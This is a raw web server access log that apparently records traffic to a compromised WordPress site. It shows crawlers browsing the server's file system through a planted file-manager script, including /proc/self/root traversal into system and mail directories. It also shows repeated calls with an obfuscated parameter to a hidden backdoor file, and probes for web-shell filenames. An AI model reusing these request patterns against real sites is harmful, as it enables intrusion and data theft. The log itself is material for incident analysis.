18.206.47.187 - - [18/Oct/2025:14:31:55 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?path=//opt/alt/libicu/usr/bin HTTP/1.1" 200 2909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.195.248.30 - - [18/Oct/2025:14:32:16 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//lib/kbd/keymaps/xkb/ba-unicode.map.gz&path=//lib/kbd/keymaps/xkb HTTP/1.1" 200 2491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.185 - - [18/Oct/2025:14:33:41 -0400] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/bin/host&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/bin HTTP/1.1" 200 2601 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.83.180.239 - - [18/Oct/2025:14:37:11 -0400] "GET /bonus-ilman-talletusta/?path=//opt/plesk/php/5.4/lib64 HTTP/1.1" 200 2791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.61.153.74 - - [18/Oct/2025:14:34:03 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831363034332p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831323434332q6664316161316331336561386639333338636238333031303334303835313563222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
216.244.66.249 - - [18/Oct/2025:14:40:33 -0400] "GET /robots.txt HTTP/1.1" 200 79 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.61.153.74 - - [18/Oct/2025:14:35:27 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831363132372p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831323532372q3665306663643637643165656538356461393661326664623836316330623164222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:14:37:12 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831363233322p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831323633322q6133616333363736663530323036613834623965663964326431303437653730222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
20.171.207.185 - - [18/Oct/2025:14:45:37 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/softaculous/koken HTTP/1.1" 200 3890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.74 - - [18/Oct/2025:14:43:31 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831363631312p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831333031312q6466663130303536643033373964623836386535366438373864306336636630222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:14:51:15 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831373037352p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831333437352q3731666438336537626338613237623966313730623332383634336330356462222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
20.171.207.185 - - [18/Oct/2025:14:56:51 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/.build-id/e7 HTTP/1.1" 200 4234 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.193.102.198 - - [18/Oct/2025:14:56:51 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//opt/alt/ruby18/lib64/libruby.so&path=//opt/alt/ruby18/lib64 HTTP/1.1" 200 2485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.61.153.74 - - [18/Oct/2025:14:54:46 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831373238362p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831333638362q6235656661616639653363363237663437386436616164376666663164636434222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:14:57:34 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831373435342p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831333835342q3235323637393736303133366563333130343661366439383734383835616330222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:15:03:11 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831373739312p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831343139312q3963393837306335633539636131643862663739646236663733643533613465222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
45.227.253.15 - - [18/Oct/2025:15:11:33 -0400] "GET /index.php/jk HTTP/1.1" 200 59 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.4.2 Mobile/15E148 Safari/604.1"
20.171.207.185 - - [18/Oct/2025:15:13:21 -0400] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/bin/lessecho&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/bin HTTP/1.1" 200 2625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.47.24 - - [18/Oct/2025:15:14:03 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//usr/lib/.build-id/43/7d334d9bebbf7f3e7d21a8b7e4ed90c6a6a30a&path=//usr/lib/.build-id/43 HTTP/1.1" 200 2508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.61.153.74 - - [18/Oct/2025:15:09:09 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831383134392p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831343534392q6539313465653634303436383633643230343636303239396538663561663261222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
177.27.204.89 - - [18/Oct/2025:15:15:33 -0400] "GET http://reneesense.com/goods/26542628.phtml?fileloc=%2Fhome%2Fwwwrenee%2Fpublic_html%2Freadme.html&path=%2Fhome%2Fwwwrenee%2Fpublic_html HTTP/1.1" 200 5496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
185.61.153.74 - - [18/Oct/2025:15:13:22 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831383430322p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831343830322q3264323033306139383532396161653931313361643134616536613762653339222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:15:15:50 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831383535302p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831343935302q3736623535333865313564653666373864313136366431303263393430343337222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:15:16:11 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831383537312p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831343937312q6665663130313539633835356534643066623432623032636538656666366332222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:15:16:53 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831383631332p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831353031332q3236646432623432353865633436643832646163343363353332626135366635222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
20.171.207.185 - - [18/Oct/2025:15:22:29 -0400] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/systemd/purge-nobody-user&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/systemd HTTP/1.1" 200 3583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.37 - - [18/Oct/2025:15:27:16 -0400] "GET /goods/241364444.phtml HTTP/1.1" 200 17972 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.249 - - [18/Oct/2025:15:30:40 -0400] "GET /robots.txt HTTP/1.1" 200 79 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.61.153.74 - - [18/Oct/2025:15:27:25 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831393234352p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831353634352q3162353335666463626132383562363861626431663933313364303731343366222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
20.171.207.185 - - [18/Oct/2025:15:34:25 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/sys/crypto HTTP/1.1" 200 3052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.200.58.199 - - [18/Oct/2025:15:37:35 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//var/softaculous/wp54/php81/import.php&path=//var/softaculous/wp54/php81 HTTP/1.1" 200 9030 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.206.212.24 - - [18/Oct/2025:15:40:23 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//usr/lib/.build-id/2d/28278d64955ca9042973e55e9d32422191105e&path=//usr/lib/.build-id/2d HTTP/1.1" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
177.75.23.159 - - [18/Oct/2025:15:43:44 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
177.75.23.159 - - [18/Oct/2025:15:44:10 -0400] "GET /geju.php HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
177.75.23.159 - - [18/Oct/2025:15:44:13 -0400] "GET /wp.php HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
185.61.153.74 - - [18/Oct/2025:15:39:00 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831393934302p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831363334302q3131643162666638303965643763656563383733633235306365333038316535222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:15:39:21 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831393936312p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831363336312q6664336661373037333661323566383832393438326233633133326264303230222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:15:40:24 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303832303032342p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831363432342q3062333938316431613737366231656136343536306233383637333331316435222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
66.249.79.36 - - [18/Oct/2025:15:47:49 -0400] "GET /goods/21164674.phtml HTTP/1.1" 200 19226 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.239.85.139 - - [18/Oct/2025:15:48:07 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//home/wwwrenee/public_html/wp-includes/browser.php&path=//home/wwwrenee/public_html/wp-includes HTTP/1.1" 200 5051 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.185 - - [18/Oct/2025:15:52:20 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/kernel HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
177.75.23.159 - - [18/Oct/2025:15:52:34 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
54.225.98.148 - - [18/Oct/2025:15:52:36 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?path=//proc/self/root/etc/cl.python HTTP/1.1" 403 55016 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
177.75.23.159 - - [18/Oct/2025:15:52:39 -0400] "GET /geju.php HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
34.236.41.241 - - [18/Oct/2025:15:56:11 -0400] "GET /2018/10/?path=//opt/plesk/php/7.3/lib64 HTTP/1.1" 200 2793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.185 - - [18/Oct/2025:15:59:21 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/rpm/macros.d HTTP/1.1" 200 4584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.74 - - [18/Oct/2025:15:55:51 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303832303935312p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831373335312q3031316634303639313139633835396330383336636239623633663364333666222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:15:56:54 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303832313031342p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831373431342q6339303930653533646133633838313261383831346633643638613766616562222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
20.171.207.185 - - [18/Oct/2025:16:02:30 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/opt/cpanel/composer HTTP/1.1" 200 3014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.244.66.249 - - [18/Oct/2025:16:06:49 -0400] "GET /girl-of-the-year-2025-journal-release-date-author-3/?path=/ HTTP/1.1" 200 30400 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.61.153.74 - - [18/Oct/2025:16:01:49 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303832313330392p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831373730392q3162653732383463393039383061656466386639333336353439363062313837222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
185.61.153.74 - - [18/Oct/2025:16:02:31 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303832313335312p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831373735312q3433663338613934316632393839376239323938626563306463396132323335222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
34.196.114.170 - - [18/Oct/2025:16:08:27 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//usr/share/automake-1.16/am/inst-vars.am&path=//usr/share/automake-1.16/am HTTP/1.1" 200 4213 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.185 - - [18/Oct/2025:16:09:09 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/home/wwwrenee/mail/reneesense.com/heretoserve HTTP/1.1" 200 3810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
